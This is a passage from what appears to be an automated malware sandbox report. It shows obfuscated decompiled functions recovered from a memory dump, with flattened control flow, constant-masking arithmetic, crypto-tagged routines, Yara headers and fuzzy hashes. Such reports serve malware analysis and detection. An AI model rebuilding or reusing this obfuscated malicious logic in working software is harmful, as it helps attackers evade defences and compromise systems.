				_v100 = _v100 * 0x1a;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0xf269cef5;
				_v100 = _v100 ^ 0xf268ee49;
				_v60 = 0xf2634;
				_v60 = _v60 * 0x5b;
				_v60 = _v60 ^ 0x0562947c;
				_v36 = 0x2018cb;
				_v36 = _v36 ^ 0x8c25c5f6;
				_v36 = _v36 ^ 0x8c05dd3d;
				_v64 = 0xf8940d;
				_v64 = _v64 | 0x87d24572;
				_v64 = _v64 ^ 0x5c16a201;
				_v64 = _v64 ^ 0xdbe26406;
				_v40 = 0x7c480a;
				_v40 = _v40 << 3;
				_v40 = _v40 ^ 0x03ea2f69;
				_v108 = 0x2ee5ba;
				_v108 = _v108 ^ 0xf599a2db;
				_v108 = _v108 >> 3;
				_v108 = _v108 >> 6;
				_v108 = _v108 ^ 0x0070f037;
				_v124 = 0xf71a4a;
				_v124 = _v124 << 0x10;
				_v124 = _v124 | 0xaf227d43;
				_v124 = _v124 >> 9;
				_v124 = _v124 ^ 0x00557cee;
				_v132 = 0xd794ed;
				_v132 = _v132 / _t398;
				_v132 = _v132 >> 0xf;
				_v132 = _v132 >> 9;
				_v132 = _v132 ^ 0x00022203;
				_v48 = 0x2c4233;
				_v48 = _v48 + 0xffff6721;
				_v48 = _v48 ^ 0x0020eee8;
				_v56 = 0x922e5e;
				_v56 = _v56 + 0xffff04d8;
				_v56 = _v56 ^ 0x00934383;
				_v84 = 0x9b8956;
				_v84 = _v84 << 4;
				_t399 = 0x3e;
				_v84 = _v84 / _t399;
				_v84 = _v84 ^ 0x0024d73e;
				_v140 = 0xe285f0;
				_t400 = 0x2b;
				_v140 = _v140 / _t400;
				_t401 = 0x75;
				_v140 = _v140 * 0x54;
				_v140 = _v140 ^ 0x36893739;
				_v140 = _v140 ^ 0x373574c3;
				_v148 = 0x700371;
				_v148 = _v148 ^ 0x52856356;
				_v148 = _v148 + 0x5a74;
				_v148 = _v148 * 0x33;
				_v148 = _v148 ^ 0x86f5f6a0;
				_v104 = 0xae45eb;
				_v104 = _v104 * 0x47;
				_v104 = _v104 ^ 0x5c3d10c1;
				_v104 = _v104 + 0xffff4879;
				_v104 = _v104 ^ 0x6c69943e;
				_v144 = 0xeba846;
				_v144 = _v144 * 0x65;
				_v144 = _v144 << 7;
				_v144 = _v144 << 0xc;
				_v144 = _v144 ^ 0x1cf6ea5a;
				_v120 = 0x7964a1;
				_v120 = _v120 << 0x10;
				_v120 = _v120 ^ 0xe77bd097;
				_v120 = _v120 ^ 0x97606998;
				_v120 = _v120 ^ 0x14b3ea1b;
				_v68 = 0x60b4f9;
				_v68 = _v68 ^ 0x3cdba86f;
				_v68 = _v68 + 0xffff76c3;
				_v68 = _v68 ^ 0x3cb9ec82;
				_v76 = 0xf18242;
				_v76 = _v76 + 0xffff0809;
				_v76 = _v76 | 0x29202b9a;
				_v76 = _v76 ^ 0x29fa2e53;
				_v28 = 0xc34101;
				_v28 = _v28 * 0x25;
				_v28 = _v28 ^ 0x1c332c9c;
				_v152 = 0x69efe7;
				_v152 = _v152 << 6;
				_v152 = _v152 >> 8;
				_v152 = _v152 | 0x90a804ff;
				_v152 = _v152 ^ 0x90b9dc27;
				_v52 = 0xbb99d0;
				_v52 = _v52 / _t401;
				_v52 = _v52 ^ 0x000f2420;
				_v24 = 0x38339b;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x000b04cc;
				_v96 = 0x52b09a;
				_v96 = _v96 | 0x755dd4ed;
				_t402 = 0x23;
				_v96 = _v96 * 0x66;
				_v96 = _v96 + 0x23a3;
				_v96 = _v96 ^ 0xc43b953b;
				_v128 = 0x98d7e0;
				_v128 = _v128 + 0x7bca;
				_v128 = _v128 * 0x3e;
				_v128 = _v128 + 0xf8ad;
				_v128 = _v128 ^ 0x2522e9e9;
				_v112 = 0x782ce5;
				_v112 = _v112 + 0xffff9380;
				_v112 = _v112 + 0x9be5;
				_v112 = _v112 ^ 0x23472c87;
				_v112 = _v112 ^ 0x233cdfa9;
				_v136 = 0x3d5208;
				_v136 = _v136 * 0x1d;
				_v136 = _v136 / _t402;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x000e447f;
				_v88 = 0xb35ee9;
				_v88 = _v88 + 0xe5d2;
				_v88 = _v88 + 0xffffdc93;
				_v88 = _v88 ^ 0x00b3e58d;
				_v92 = 0x21f8b6;
				_v92 = _v92 * 0x30;
				_v92 = _v92 >> 6;
				_v92 = _v92 | 0x81929639;
				_v92 = _v92 ^ 0x81904b86;
				_v32 = 0x36c343;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x00d9bc6c;
				while(_t368 != 0x1c43801) {
					if(_t368 == 0x9b73326) {
						_t355 = E001C7C0C( *((intOrPtr*)( *0x1e5220 + 0x44)),  *_t395, _v64, _t368, _v40,  &_v16, _v72, _v108, _v116, _v124, _v132,  *((intOrPtr*)(_t395 + 4)), _v48, _t368, _v56, _v80, _v84, _v140, _t393, _v148);
						_t405 = _t405 + 0x48;
						if(_t355 == _v100) {
							_t368 = 0xe7fcf14;
							continue;
						}
					} else {
						if(_t368 == 0xb54e992) {
							_t358 = E001C7C0C( *((intOrPtr*)( *0x1e5220 + 0x44)),  *_t395, _v76, _t368, _v28,  &_v16, _v44, _v152, _v60, _v52, _v24,  *((intOrPtr*)(_t395 + 4)), _v96, _t368, _v128, _v16, _v112, _v136, _v20, _v88);
							_t405 = _t405 + 0x48;
							if(_t358 == _v36) {
								 *_t366 = _v20;
								_t393 = 1;
								 *((intOrPtr*)(_t366 + 4)) = _v16;
							} else {
								_t368 = 0x1c43801;
								continue;
							}
						} else {
							if(_t368 == 0xe28fb16) {
								_t368 = 0x9b73326;
								continue;
							} else {
								if(_t368 != 0xe7fcf14) {
									L14:
									if(_t368 != 0x2c4f76c) {
										continue;
									} else {
									}
								} else {
									_push(_t368);
									_push(_t368);
									_t365 = E001D5212(_v16);
									_t405 = _t405 + 0xc;
									_v20 = _t365;
									if(_t365 != 0) {
										_t368 = 0xb54e992;
										continue;
									}
								}
							}
						}
					}
					return _t393;
				}
				E001CAE43(_v20, _v92, _v32);
				_t368 = 0x2c4f76c;
				goto L14;
			}
























































                          0x001db680
                          0x001db687
                          0x001db68a
                          0x001db691
                          0x001db698
                          0x001db699
                          0x001db6a0
                          0x001db6a1
                          0x001db6a2
                          0x001db6a7
                          0x001db6b2
                          0x001db6b4
                          0x001db6bb
                          0x001db6be
                          0x001db6c8
                          0x001db6cc
                          0x001db6d1
                          0x001db6d6
                          0x001db6de
                          0x001db6e9
                          0x001db6f1
                          0x001db6fc
                          0x001db704
                          0x001db70a
                          0x001db70f
                          0x001db719
                          0x001db71e
                          0x001db724
                          0x001db72c
                          0x001db734
                          0x001db741
                          0x001db742
                          0x001db746
                          0x001db74e
                          0x001db756
                          0x001db763
                          0x001db767
                          0x001db76c
                          0x001db774
                          0x001db77c
                          0x001db789
                          0x001db78d
                          0x001db795
                          0x001db7a0
                          0x001db7ab
                          0x001db7b6
                          0x001db7be
                          0x001db7c6
                          0x001db7ce
                          0x001db7d6
                          0x001db7e1
                          0x001db7e9
                          0x001db7f4
                          0x001db7fc
                          0x001db804
                          0x001db809
                          0x001db80e
                          0x001db816
                          0x001db81e
                          0x001db823
                          0x001db82b
                          0x001db830
                          0x001db838
                          0x001db846
                          0x001db84c
                          0x001db851
                          0x001db856
                          0x001db85e
                          0x001db866
                          0x001db86e
                          0x001db876
                          0x001db87e
                          0x001db886
                          0x001db88e
                          0x001db896
                          0x001db8a1
                          0x001db8a6
                          0x001db8ac
                          0x001db8b4
                          0x001db8c0
                          0x001db8c5
                          0x001db8d0
                          0x001db8d1
                          0x001db8d5
                          0x001db8dd
                          0x001db8e5
                          0x001db8ed
                          0x001db8f5
                          0x001db902
                          0x001db906
                          0x001db90e
                          0x001db91b
                          0x001db91f
                          0x001db927
                          0x001db92f
                          0x001db937
                          0x001db944
                          0x001db948
                          0x001db94d
                          0x001db952
                          0x001db95a
                          0x001db962
                          0x001db967
                          0x001db96f
                          0x001db977
                          0x001db97f
                          0x001db987
                          0x001db98f
                          0x001db997
                          0x001db99f
                          0x001db9a7
                          0x001db9af
                          0x001db9b7
                          0x001db9bf
                          0x001db9d2
                          0x001db9d9
                          0x001db9e4
                          0x001db9ec
                          0x001db9f1
                          0x001db9f6
                          0x001db9fe
                          0x001dba06
                          0x001dba14
                          0x001dba18
                          0x001dba20
                          0x001dba2b
                          0x001dba33
                          0x001dba3e
                          0x001dba48
                          0x001dba57
                          0x001dba58
                          0x001dba5c
                          0x001dba64
                          0x001dba6c
                          0x001dba74
                          0x001dba81
                          0x001dba85
                          0x001dba8d
                          0x001dba95
                          0x001dba9d
                          0x001dbaa5
                          0x001dbaad
                          0x001dbab5
                          0x001dbabd
                          0x001dbaca
                          0x001dbad9
                          0x001dbadd
                          0x001dbae2
                          0x001dbaea
                          0x001dbaf2
                          0x001dbafa
                          0x001dbb02
                          0x001dbb0a
                          0x001dbb17
                          0x001dbb1b
                          0x001dbb20
                          0x001dbb28
                          0x001dbb30
                          0x001dbb3b
                          0x001dbb43
                          0x001dbb4e
                          0x001dbb5c
                          0x001dbc9c
                          0x001dbca1
                          0x001dbca8
                          0x001dbcaa
                          0x00000000
                          0x001dbcaa
                          0x001dbb62
                          0x001dbb68
                          0x001dbc24
                          0x001dbc29
                          0x001dbc33
                          0x001dbce8
                          0x001dbcea
                          0x001dbcf2
                          0x001dbc39
                          0x001dbc39
                          0x00000000
                          0x001dbc39
                          0x001dbb6a
                          0x001dbb70
                          0x001dbbb5
                          0x00000000
                          0x001dbb72
                          0x001dbb78
                          0x001dbcd1
                          0x001dbcd7
                          0x00000000
                          0x00000000
                          0x001dbcdd
                          0x001dbb7e
                          0x001dbb8e
                          0x001dbb8f
                          0x001dbb97
                          0x001dbb9c
                          0x001dbb9f
                          0x001dbba8
                          0x001dbbae
                          0x00000000
                          0x001dbbae
                          0x001dbba8
                          0x001dbb78
                          0x001dbb70
                          0x001dbb68
                          0x001dbd01
                          0x001dbd01
                          0x001dbcc6
                          0x001dbccc
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: H|$?($tZ$,x$|U$ $"%$i
                          • API String ID: 0-3225341047
                          • Opcode ID: a1969aad79370cc1080a7cd8203e000f845f1f23b7aa24b8f62fd6b7d4998efa
                          • Instruction ID: c15268fd422479472edb03723e9ecede2ce952de68fb262c3bc0bf709501dd91
                          • Opcode Fuzzy Hash: a1969aad79370cc1080a7cd8203e000f845f1f23b7aa24b8f62fd6b7d4998efa
                          • Instruction Fuzzy Hash: 0CF1EE72009380DFD769CF65C58AA5BFBF1FBD4748F50891DE29A86260C7B28949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CB464, Relevance: 9.1, Strings: 7, Instructions: 357COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E001CB464(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				void* _t317;
				intOrPtr _t334;
				void* _t343;
				signed int _t346;
				intOrPtr _t357;
				intOrPtr _t358;
				intOrPtr _t359;
				void* _t384;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr* _t396;
				signed int _t399;
				intOrPtr _t403;
				signed int* _t405;
				void* _t407;

				_t359 = __ecx;
				_push(_a8);
				_v176 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C358A(_t317);
				_v16 = 0xe2afa9;
				_t358 = 0;
				_v12 = 0xe8fe81;
				_t405 =  &(( &_v184)[4]);
				_v8 = 0;
				_v4 = 0;
				_t399 = 0xc5a16cd;
				_v152 = 0x16c55a;
				_t403 = 0;
				_t390 = 0x52;
				_push("true");
				_v152 = _v152 * 0x7e;
				_v152 = _v152 ^ 0x9593734d;
				_v152 = _v152 * 0x27;
				_v152 = _v152 ^ 0x2b565726;
				_v160 = 0xd3489c;
				_v160 = _v160 + 0x93cd;
				_v160 = _v160 + 0xffff2680;
				_v160 = _v160 + 0xffff794a;
				_v160 = _v160 ^ 0x00d27c32;
				_v64 = 0x2f84e2;
				_v64 = _v64 ^ 0x4de93f40;
				_v64 = _v64 ^ 0x4dc6bba3;
				_v80 = 0x1be24f;
				_v80 = _v80 | 0x235428fb;
				_v80 = _v80 ^ 0x2353c844;
				_v120 = 0xf22c43;
				_v120 = _v120 << 0xc;
				_v120 = _v120 + 0x464d;
				_v120 = _v120 ^ 0x22cda256;
				_v128 = 0x5cc4be;
				_v128 = _v128 >> 7;
				_v128 = _v128 + 0x57a4;
				_v128 = _v128 ^ 0x0008b686;
				_v136 = 0xa3ff76;
				_v136 = _v136 << 7;
				_v136 = _v136 ^ 0xbe1be495;
				_v136 = _v136 ^ 0xefe2a377;
				_v100 = 0x946aa4;
				_v100 = _v100 / _t390;
				_v100 = _v100 ^ 0x000fb806;
				_v132 = 0x7d878a;
				_pop(_t391);
				_v132 = _v132 / _t391;
				_v132 = _v132 + 0x2f9;
				_v132 = _v132 ^ 0x000542bc;
				_v180 = 0xe3bf55;
				_v180 = _v180 >> 6;
				_v180 = _v180 + 0xffff773e;
				_v180 = _v180 ^ 0x8c2a66b6;
				_v180 = _v180 ^ 0x8c22efe7;
				_v44 = 0x9aff86;
				_v44 = _v44 << 0xb;
				_v44 = _v44 ^ 0xd7fa1a19;
				_v156 = 0x26ab5d;
				_v156 = _v156 >> 0x10;
				_v156 = _v156 | 0xcaa0c117;
				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x830d05c0;
				_v48 = 0xa14e19;
				_v48 = _v48 | 0x4d303281;
				_v48 = _v48 ^ 0x4dbb2754;
				_v68 = 0xf61636;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x0039c1ba;
				_v40 = 0x2115cf;
				_v40 = _v40 ^ 0xa207a02b;
				_v40 = _v40 ^ 0xa22acf19;
				_v148 = 0xc0aafe;
				_v148 = _v148 >> 3;
				_v148 = _v148 ^ 0xba58c75e;
				_v148 = _v148 | 0xe4d62354;
				_v148 = _v148 ^ 0xfed5de21;
				_v164 = 0xeceffe;
				_v164 = _v164 >> 9;
				_t392 = 3;
				_v164 = _v164 / _t392;
				_v164 = _v164 | 0x3a3b050d;
				_v164 = _v164 ^ 0x3a3ef861;
				_v76 = 0x42da81;
				_v76 = _v76 >> 9;
				_v76 = _v76 ^ 0x0001f136;
				_v144 = 0x377b00;
				_v144 = _v144 + 0xffff7b03;
				_v144 = _v144 | 0xed8d4517;
				_v144 = _v144 + 0x474e;
				_v144 = _v144 ^ 0xedc1bf3b;
				_v60 = 0x529a79;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 ^ 0x00099224;
				_v124 = 0x8fcbd4;
				_t393 = 0x4b;
				_v124 = _v124 / _t393;
				_t394 = 0x3d;
				_v124 = _v124 / _t394;
				_v124 = _v124 ^ 0x000fe13a;
				_v72 = 0x2d37b4;
				_v72 = _v72 ^ 0xb9387ba4;
				_v72 = _v72 ^ 0xb912d11a;
				_v184 = 0x7a0678;
				_v184 = _v184 | 0x4e91e946;
				_v184 = _v184 ^ 0x687527e4;
				_v184 = _v184 + 0x597c;
				_v184 = _v184 ^ 0x268aedf8;
				_v172 = 0x81785;
				_v172 = _v172 + 0xffff7f8b;
				_v172 = _v172 << 0xf;
				_v172 = _v172 ^ 0x3e034c91;
				_v172 = _v172 ^ 0xf58ad6ee;
				_v52 = 0x9795e3;
				_t395 = 0x72;
				_v52 = _v52 * 0x58;
				_v52 = _v52 ^ 0x341dc3b3;
				_v92 = 0xdf88e7;
				_v92 = _v92 + 0xffff49f2;
				_v92 = _v92 ^ 0x00d663b2;
				_v108 = 0x1042e6;
				_v108 = _v108 >> 0xd;
				_v108 = _v108 ^ 0x0002fcf8;
				_v36 = 0xb7de0d;
				_v36 = _v36 + 0xa73b;
				_v36 = _v36 ^ 0x00b48d5d;
				_v84 = 0x7d7419;
				_v84 = _v84 / _t395;
				_v84 = _v84 ^ 0x0006a1ac;
				_v116 = 0xb994e1;
				_v116 = _v116 + 0xffff62f2;
				_v116 = _v116 << 0xb;
				_v116 = _v116 ^ 0xc7b464f4;
				_v168 = 0x398b08;
				_v168 = _v168 >> 0xf;
				_v168 = _v168 + 0x5c1b;
				_v168 = _v168 + 0xffff8532;
				_v168 = _v168 ^ 0xfffb96f1;
				_v104 = 0x89faea;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x0447e579;
				_v88 = 0xfd5523;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0x552c421d;
				_v96 = 0xe47266;
				_v96 = _v96 << 7;
				_v96 = _v96 ^ 0x723a4834;
				_v112 = 0x930317;
				_v112 = _v112 ^ 0x0c22be31;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x00ca62ca;
				_v56 = 0xce9100;
				_v56 = _v56 ^ 0x8f2e07e0;
				_v56 = _v56 ^ 0x8fec4dc8;
				_t396 = _v28;
				while(1) {
					L1:
					_t334 = _v140;
					while(1) {
						L2:
						_t407 = _t399 - 0xc5a16cd;
						if(_t407 > 0) {
							goto L18;
						}
						L3:
						if(_t407 == 0) {
							_t399 = 0xcba4d8f;
							continue;
						} else {
							if(_t399 == _t384) {
								_t363 = _v156;
								_t343 = E001D48B4(_v156, _t359, _t359, _v48, _t359, _v68, _v40, _t359, _v148, _v164,  &_v20, _t359, _t358, _v76, _v144, _t359,  &_v28);
								_t405 =  &(_t405[0x10]);
								if(_t343 == 0) {
									L15:
									_t399 = 0xeaf1192;
									L16:
									_t334 = _v140;
								} else {
									_t346 = E001DED56(_t363);
									_t399 = 0xc870d87;
									_t334 = _v28 * 0x2c + _t358;
									_v140 = _t334;
									_t396 =  >=  ? _t358 : (_t346 & 0x0000001f) * 0x2c + _t358;
								}
								_t359 = _v176;
								_t384 = 0x8067b6;
								continue;
							} else {
								if(_t399 == 0x60bf0fb) {
									E001C8CCC(_v172, _v52, _t403, _v92, _v108, _v152, _t359, _v32,  &_v24);
									_t399 =  !=  ? 0xf9b0111 : 0x685b925;
									_t334 = E001CEDC5(_v36, _v32, _v84, _v116);
									_t405 =  &(_t405[9]);
									L29:
									_t359 = _v176;
									_t384 = 0x8067b6;
									goto L30;
								} else {
									if(_t399 == 0x685b925) {
										_t396 = _t396 + 0x2c;
										asm("sbb esi, esi");
										_t399 = (_t399 & 0xfdd7fbf5) + 0xeaf1192;
										continue;
									} else {
										if(_t399 == 0xb0ce4d8) {
											return E001CAE43(_t358, _v112, _v56);
										}
										if(_t399 != 0xc516496) {
											L30:
											if(_t399 != 0xa0a29da) {
												goto L1;
											}
										} else {
											_push(_t359);
											_push(_t359);
											_t357 = E001D5212(0x2000);
											_t359 = _v176;
											_t403 = _t357;
											_t405 =  &(_t405[3]);
											_t384 = 0x8067b6;
											_t399 =  !=  ? 0x8067b6 : 0xb0ce4d8;
											while(1) {
												L1:
												_t334 = _v140;
												while(1) {
													L2:
													_t407 = _t399 - 0xc5a16cd;
													if(_t407 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										}
									}
								}
							}
						}
						L33:
						return _t334;
						L18:
						if(_t399 == 0xc870d87) {
							_t334 = E001CA323(_v64,  *_t396, _t359, _v72, _v184);
							_t405 =  &(_t405[3]);
							_v32 = _t334;
							if(_t334 == 0) {
								_t399 = 0x685b925;
								goto L29;
							} else {
								_t399 = 0x60bf0fb;
								goto L16;
							}
						} else {
							if(_t399 == 0xcba4d8f) {
								_push(_t359);
								_push(_t359);
								_t334 = E001D5212(0x20000);
								_t358 = _t334;
								_t405 =  &(_t405[3]);
								if(_t358 != 0) {
									_t399 = 0xc516496;
									goto L16;
								}
							} else {
								if(_t399 == 0xeaf1192) {
									_t304 =  &_v96; // 0x723a4834
									E001CAE43(_t403, _v88,  *_t304);
									_t399 = 0xb0ce4d8;
									goto L16;
								} else {
									_t334 = 0xf9b0111;
									if(_t399 != 0xf9b0111) {
										goto L30;
									} else {
										E001D9660(_t403, _v160, _v168, _v104, _a8);
										_t405 =  &(_t405[3]);
										goto L15;
									}
								}
							}
						}
						goto L33;
					}
				}
			}




































































                          0x001cb464
                          0x001cb46e
                          0x001cb475
                          0x001cb479
                          0x001cb480
                          0x001cb481
                          0x001cb482
                          0x001cb487
                          0x001cb492
                          0x001cb494
                          0x001cb49f
                          0x001cb4a2
                          0x001cb4ab
                          0x001cb4b2
                          0x001cb4b7
                          0x001cb4bf
                          0x001cb4c8
                          0x001cb4c9
                          0x001cb4cb
                          0x001cb4cf
                          0x001cb4dc
                          0x001cb4e0
                          0x001cb4e8
                          0x001cb4f0
                          0x001cb4f8
                          0x001cb500
                          0x001cb508
                          0x001cb510
                          0x001cb51b
                          0x001cb526
                          0x001cb531
                          0x001cb539
                          0x001cb541
                          0x001cb549
                          0x001cb551
                          0x001cb556
                          0x001cb55e
                          0x001cb566
                          0x001cb56e
                          0x001cb573
                          0x001cb57b
                          0x001cb583
                          0x001cb58b
                          0x001cb590
                          0x001cb598
                          0x001cb5a0
                          0x001cb5b0
                          0x001cb5b4
                          0x001cb5bc
                          0x001cb5c8
                          0x001cb5cb
                          0x001cb5cf
                          0x001cb5d7
                          0x001cb5df
                          0x001cb5e7
                          0x001cb5ec
                          0x001cb5f4
                          0x001cb5fc
                          0x001cb604
                          0x001cb60f
                          0x001cb617
                          0x001cb622
                          0x001cb62a
                          0x001cb62f
                          0x001cb637
                          0x001cb63c
                          0x001cb644
                          0x001cb64f
                          0x001cb65a
                          0x001cb665
                          0x001cb672
                          0x001cb67a
                          0x001cb685
                          0x001cb690
                          0x001cb69b
                          0x001cb6a6
                          0x001cb6ae
                          0x001cb6b3
                          0x001cb6bb
                          0x001cb6c3
                          0x001cb6cb
                          0x001cb6d3
                          0x001cb6de
                          0x001cb6e3
                          0x001cb6e9
                          0x001cb6f1
                          0x001cb6f9
                          0x001cb704
                          0x001cb70c
                          0x001cb717
                          0x001cb71f
                          0x001cb727
                          0x001cb72f
                          0x001cb737
                          0x001cb73f
                          0x001cb74a
                          0x001cb752
                          0x001cb75d
                          0x001cb769
                          0x001cb76e
                          0x001cb778
                          0x001cb77d
                          0x001cb783
                          0x001cb78b
                          0x001cb796
                          0x001cb7a1
                          0x001cb7ac
                          0x001cb7b4
                          0x001cb7bc
                          0x001cb7c4
                          0x001cb7cc
                          0x001cb7d4
                          0x001cb7dc
                          0x001cb7e4
                          0x001cb7e9
                          0x001cb7f1
                          0x001cb7f9
                          0x001cb80c
                          0x001cb80d
                          0x001cb814
                          0x001cb81f
                          0x001cb827
                          0x001cb82f
                          0x001cb837
                          0x001cb83f
                          0x001cb844
                          0x001cb84c
                          0x001cb857
                          0x001cb862
                          0x001cb86d
                          0x001cb87b
                          0x001cb87f
                          0x001cb887
                          0x001cb88f
                          0x001cb89c
                          0x001cb8a1
                          0x001cb8a9
                          0x001cb8b1
                          0x001cb8b6
                          0x001cb8be
                          0x001cb8c6
                          0x001cb8ce
                          0x001cb8d6
                          0x001cb8db
                          0x001cb8e3
                          0x001cb8eb
                          0x001cb8f0
                          0x001cb8f8
                          0x001cb900
                          0x001cb905
                          0x001cb90d
                          0x001cb915
                          0x001cb91d
                          0x001cb922
                          0x001cb92a
                          0x001cb935
                          0x001cb940
                          0x001cb94b
                          0x001cb952
                          0x001cb952
                          0x001cb952
                          0x001cb956
                          0x001cb956
                          0x001cb956
                          0x001cb95c
                          0x00000000
                          0x00000000
                          0x001cb962
                          0x001cb962
                          0x001cbae6
                          0x00000000
                          0x001cb968
                          0x001cb96a
                          0x001cba8d
                          0x001cba91
                          0x001cba96
                          0x001cba9b
                          0x001cbadb
                          0x001cbadb
                          0x001cbae0
                          0x001cbae0
                          0x001cba9d
                          0x001cbaa8
                          0x001cbab0
                          0x001cbac2
                          0x001cbac6
                          0x001cbaca
                          0x001cbaca
                          0x001cbacd
                          0x001cbad1
                          0x00000000
                          0x001cb970
                          0x001cb976
                          0x001cba14
                          0x001cba3e
                          0x001cba41
                          0x001cba46
                          0x001cbbb5
                          0x001cbbb5
                          0x001cbbb9
                          0x00000000
                          0x001cb978
                          0x001cb97e
                          0x001cb9d1
                          0x001cb9d6
                          0x001cb9de
                          0x00000000
                          0x001cb980
                          0x001cb986
                          0x00000000
                          0x001cbbdd
                          0x001cb992
                          0x001cbbbe
                          0x001cbbc4
                          0x00000000
                          0x001cbbc6
                          0x001cb998
                          0x001cb9ab
                          0x001cb9ac
                          0x001cb9b2
                          0x001cb9b7
                          0x001cb9bb
                          0x001cb9bd
                          0x001cb9c7
                          0x001cb9cc
                          0x001cb952
                          0x001cb952
                          0x001cb952
                          0x001cb956
                          0x001cb956
                          0x001cb956
                          0x001cb95c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x001cb95c
                          0x00000000
                          0x001cb956
                          0x001cb952
                          0x001cb992
                          0x001cb97e
                          0x001cb976
                          0x001cb96a
                          0x001cbbe8
                          0x001cbbe8
                          0x001cbaf0
                          0x001cbaf6
                          0x001cbb93
                          0x001cbb98
                          0x001cbb9b
                          0x001cbba4
                          0x001cbbb0
                          0x00000000
                          0x001cbba6
                          0x001cbba6
                          0x00000000
                          0x001cbba6
                          0x001cbafc
                          0x001cbb02
                          0x001cbb5f
                          0x001cbb60
                          0x001cbb66
                          0x001cbb6b
                          0x001cbb6d
                          0x001cbb72
                          0x001cbb74
                          0x00000000
                          0x001cbb74
                          0x001cbb04
                          0x001cbb0a
                          0x001cbb38
                          0x001cbb42
                          0x001cbb48
                          0x00000000
                          0x001cbb0c
                          0x001cbb0c
                          0x001cbb13
                          0x00000000
                          0x001cbb19
                          0x001cbb2e
                          0x001cbb33
                          0x00000000
                          0x001cbb33
                          0x001cbb13
                          0x001cbb0a
                          0x001cbb02
                          0x00000000
                          0x001cbaf6
                          0x001cb956

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &WV+$4H:r$@?M$MF$NG$|Y$'uh
                          • API String ID: 0-4100433312
                          • Opcode ID: 38e5f9a793c0e5397a6bc99214c1423183a92482fa00dd030636ba4dfd883c73
                          • Instruction ID: c99e68ffa1577e2375b4b5e436c4fc6eb4b2e3e9f6c0ee1e44c5860c37c8d20b
                          • Opcode Fuzzy Hash: 38e5f9a793c0e5397a6bc99214c1423183a92482fa00dd030636ba4dfd883c73
                          • Instruction Fuzzy Hash: F10222725083808FD768CF65C98AA5BFBE1FBD4708F108A1DE6D996220D7B48909CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D89A2, Relevance: 9.1, Strings: 7, Instructions: 336COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E001D89A2(void* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _t291;
				void* _t306;
				intOrPtr _t310;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t333;
				intOrPtr _t334;
				void* _t337;
				intOrPtr _t339;
				intOrPtr _t365;
				void* _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				void* _t384;
				void* _t385;
				signed int* _t387;
				void* _t389;
				void* _t395;

				_t395 = __fp0;
				_push(_a24);
				_t385 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C358A(_t291);
				_v368 = 0x969fa1;
				_t387 =  &(( &_v404)[8]);
				_v368 = _v368 ^ 0x3dce833c;
				_t334 = 0;
				_t337 = 0x82450b3;
				_t380 = 0x39;
				_v368 = _v368 * 0x56;
				_v368 = _v368 ^ 0x9b96e7de;
				_v384 = 0x522009;
				_v384 = _v384 | 0xefa7af6e;
				_v384 = _v384 + 0x84bf;
				_v384 = _v384 << 0xc;
				_v384 = _v384 ^ 0x83454f1d;
				_v376 = 0xbc1b17;
